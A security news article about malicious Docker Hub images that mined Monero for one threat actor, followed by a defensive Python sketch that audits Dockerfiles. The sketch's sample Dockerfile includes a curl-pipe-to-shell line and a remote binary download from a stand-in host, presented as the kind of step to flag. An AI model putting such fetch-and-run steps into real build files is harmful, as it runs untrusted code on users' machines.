Malicious Docker Containers Earn Cryptomining Criminals $90K

Researchers said over a dozen malicious Docker images available on Docker Hub allowed hackers to earn $90,000 in cryptojacking profits.


Seventeen malicious Docker containers earned cryptomining criminals $90,000 in 30 days in what could be a harbinger of things to come.

The figure may seem tame compared to some of the larger paydays that cryptojackers have earned. But researchers at Kromtech Security Center warn that containers are shaping up to be the next ripe target for these types of criminals.

Kromtech said the malicious Docker images (17 in total) were pulled down from the Docker Hub image repository. Researchers can’t say for sure how many times the rogue containers were used by Docker Hub users, but Kromtech estimates that the 17 images were downloaded collectively 5 million times during the year they were available.

All 17 were removed from Docker Hub on May 10 by Docker, after Fortinet found the containers and published a report on the images being used to mine cryptocurrency. Fortinet was able to tie the compromised containers back to one threat actor, thanks to a shared Monero wallet.

“By pushing malicious images to a Docker Hub registry and pulling it from the victim’s system, hackers were able to mine 544.74 Monero, which is equal to $90,000,” wrote Kromtech, in a Tuesday blog post building off previous findings both from Fortinet and Aqua Security, which in February detailed numerous ways that containers can be abused.

Kromtech’s report delved deeper into the malicious containers found by Fortinet and the larger Docker threat landscape. Of the 17 malicious containers, Kromtech said nine had the mining software pre-installed. The others were intentionally left misconfigured and available on Docker Hub, allowing the adversary access to the instances at a later date. Each of the images advertised itself as a tool for a popular software product such as Apache Tomcat, MySQL or Cron.

“Today’s growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero,” Kromtech researchers wrote. Kubernetes is a container orchestration system with tools that automate the deployment, updating and monitoring of containers.

Using public repositories to hide malicious content in plain sight is nothing new. Third-party code repositories such as GitHub, Bitbucket and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Similarly, Docker Hub offers developers time-saving functions. Both can be targeted by rogue developers.

“Comparing Docker Hub with GitHub isn’t an exact match,” Kromtech explained. “Hackers can hide malicious instructions in Dockerfile (where Docker commands are stored) from users.”

In an email response to a Threatpost request for comment, David Lawrence, head of security at Docker, wrote: 

“As with public repositories like GitHub, Docker Hub is there for the service of the community. When dealing with open public repositories and open source code, we recommend that you follow a few best practices including: know the content author, scan images before running and use curated official images in Docker Hub and certified content in Docker Store whenever possible.”

Kromtech said the increased attention by hackers to publicly accessible orchestration platforms such as Kubernetes began at the start of 2018, when attackers moved on from Amazon Elastic Compute Cloud exploits to container-specific exploits. Some of those attacks took advantage of hundreds of misconfigured Kubernetes administration consoles, researchers said. One high-profile attack targeted carmaker Tesla:

“The hackers had infiltrated Tesla’s Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment, which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla’s Kubernetes pods,” Kromtech said.

For Docker’s part, it does offer tools to its enterprise customers to mitigate rogue containers. Docker had previously offered security scanning for Docker Hub users, but shuttered the free offering in March. There are also numerous free Docker security and scanning tools to choose from.

“The process of pulling a Docker image has to be transparent and easy to follow. First, you can simply try to look through Dockerfile to find out what the FROM and ENTRYPOINT notations are and what the container does. Second, Docker images are built using the Docker automated builds. That’s because, with Docker automated builds, you get traceability between the source of the Dockerfile, the version of the image, and the actual build output,” Kromtech researchers said.

For other container projects, they said developers need to focus on similar container traceability in a bid to protect their cloud instances.
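
As an added example (not code from Kromtech, Fortinet or Docker), the Dockerfile read-through Kromtech describes can be scripted: this Python sketch lists the FROM and ENTRYPOINT/CMD values and flags RUN/ADD steps that reference a remote URL. The sample Dockerfile, the `logical_lines` and `review` helper names and the URL heuristic are assumptions made for illustration.

```python
import re

# Constructed sample Dockerfile for illustration; not one of the reported images.
SAMPLE = """\
# advertised as a Tomcat helper
FROM ubuntu:16.04
RUN apt-get update && \\
    apt-get install -y curl
RUN curl -s http://files.example.invalid/setup.sh | sh
ADD http://files.example.invalid/worker /usr/local/bin/worker
CMD ["--help"]
ENTRYPOINT ["/usr/local/bin/worker", "--threads", "4"]
"""

# Assumed heuristic (not from the report): a build step that references a remote URL.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.I)

def logical_lines(text):
    """Join backslash-continued lines; skip blank lines and comments."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1].strip() + " "
            continue
        yield buf + line
        buf = ""

def review(text):
    """Summarise base images, the start command, and steps that fetch remote content."""
    report = {"from": [], "entrypoint": None, "cmd": None, "remote_fetch": []}
    for line in logical_lines(text):
        instr, _, arg = line.partition(" ")
        instr, arg = instr.upper(), arg.strip()
        if instr == "FROM":
            # Skip flags such as --platform=...; keep only the image reference.
            report["from"].append(next((t for t in arg.split() if not t.startswith("--")), ""))
        elif instr in ("ENTRYPOINT", "CMD"):
            # Simplification: the file is treated as one stage, where the last one wins.
            report[instr.lower()] = arg
        elif instr in ("RUN", "ADD") and REMOTE_URL.search(arg):
            report["remote_fetch"].append(line)
    return report

if __name__ == "__main__":
    for key, value in review(SAMPLE).items():
        print(f"{key}: {value}")
```

The report only covers what the Dockerfile itself declares; an ENTRYPOINT or extra layers inherited from the base image named in FROM have to be checked in that image's own Dockerfile.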

(This article was updated at 11:30 pm ET on 6/13 with a response from Docker)
